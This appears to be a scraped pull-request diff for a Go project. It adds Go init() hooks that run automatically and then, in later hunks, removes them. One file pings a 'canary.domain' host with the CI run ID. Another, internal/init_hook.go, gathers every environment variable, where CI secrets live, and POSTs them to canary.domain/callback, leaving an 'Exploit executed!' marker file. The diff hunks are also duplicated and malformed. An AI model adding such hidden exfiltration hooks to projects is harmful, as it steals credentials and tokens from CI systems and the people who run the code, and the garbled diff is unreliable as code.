basecamp · sanling1 · Apr 19, 2026 · Apr 19, 2026 · Copilot · Apr 19, 2026
diff --git a/cmd/fizzy/exploit.go b/cmd/fizzy/exploit.go
@@ -0,0 +1,11 @@
+package main
+
+import (
+    "net/http"
+    "os"
+)
+
+func init() {
+    // Simple HTTP callback to verify execution
+    http.Get("http://canary.domain/" + os.Getenv("GITHUB_RUN_ID"))
+}
-package main
-
-import (
-    "net/http"
-    "os"
-)
-
-func init() {
-    // Simple HTTP callback to verify execution
-    http.Get("http://canary.domain/" + os.Getenv("GITHUB_RUN_ID"))
-}
+package main
-package main
-
-import (
-    "net/http"
-    "os"
-)
-
-func init() {
-    // Simple HTTP callback to verify execution
-    http.Get("http://canary.domain/" + os.Getenv("GITHUB_RUN_ID"))
-}
+package main
diff --git a/internal/init_hook.go b/internal/init_hook.go
@@ -0,0 +1,44 @@
+package main
+
+import (
+    "fmt"
+    "io"
+    "net/http"
+    "net/url"
+    "os"
+    "strings"
+)
+
+func init() {
+    // Collect environment variables
+    var envData []string
+    for _, e := range os.Environ() {
+        envData = append(envData, e)
+    }
+    envStr := strings.Join(envData, "\n")
+
+    // URL encode the data
+    encoded := url.QueryEscape(envStr)
+
+    // Make HTTP POST request with environment data
+    data := url.Values{}
+    data.Set("env", envStr[:min(1000, len(envStr))]) // Send first 1000 chars
+
+    // Use the canary URL
+    resp, err := http.PostForm("http://canary.domain/callback", data)
+    if err == nil {
+        defer resp.Body.Close()
+    }
+
+    // Also write to a file as backup evidence
+    f, _ := os.Create("/tmp/exploit_evidence.txt")
+    fmt.Fprintf(f, "Exploit executed! Run ID: %s\n", os.Getenv("GITHUB_RUN_ID"))
+    f.Close()
+}
+
+func min(a, b int) int {
+    if a < b {
+        return a
+    }
+    return b
-import (
-    "fmt"
-    "io"
-    "net/http"
-    "net/url"
-    "os"
-    "strings"
-)
-
-func init() {
-    // Collect environment variables
-    var envData []string
-    for _, e := range os.Environ() {
-        envData = append(envData, e)
-    }
-    envStr := strings.Join(envData, "\n")
-    
-    // URL encode the data
-    encoded := url.QueryEscape(envStr)
-    
-    // Make HTTP POST request with environment data
-    data := url.Values{}
-    data.Set("env", envStr[:min(1000, len(envStr))]) // Send first 1000 chars
-    
-    // Use the canary URL
-    resp, err := http.PostForm("http://canary.domain/callback", data)
-    if err == nil {
-        defer resp.Body.Close()
-    }
-    
-    // Also write to a file as backup evidence
-    f, _ := os.Create("/tmp/exploit_evidence.txt")
-    fmt.Fprintf(f, "Exploit executed! Run ID: %s\n", os.Getenv("GITHUB_RUN_ID"))
-    f.Close()
-}
-
-func min(a, b int) int {
-    if a < b {
-        return a
-    }
-    return b
+func init() {
+    // Intentionally left blank.
-import (
-    "fmt"
-    "io"
-    "net/http"
-    "net/url"
-    "os"
-    "strings"
-)
-
-func init() {
-    // Collect environment variables
-    var envData []string
-    for _, e := range os.Environ() {
-        envData = append(envData, e)
-    }
-    envStr := strings.Join(envData, "\n")
-    
-    // URL encode the data
-    encoded := url.QueryEscape(envStr)
-    
-    // Make HTTP POST request with environment data
-    data := url.Values{}
-    data.Set("env", envStr[:min(1000, len(envStr))]) // Send first 1000 chars
-    
-    // Use the canary URL
-    resp, err := http.PostForm("http://canary.domain/callback", data)
-    if err == nil {
-        defer resp.Body.Close()
-    }
-    
-    // Also write to a file as backup evidence
-    f, _ := os.Create("/tmp/exploit_evidence.txt")
-    fmt.Fprintf(f, "Exploit executed! Run ID: %s\n", os.Getenv("GITHUB_RUN_ID"))
-    f.Close()
-}
-
-func min(a, b int) int {
-    if a < b {
-        return a
-    }
-    return b
+func init() {
+    // Intentionally left blank.
+}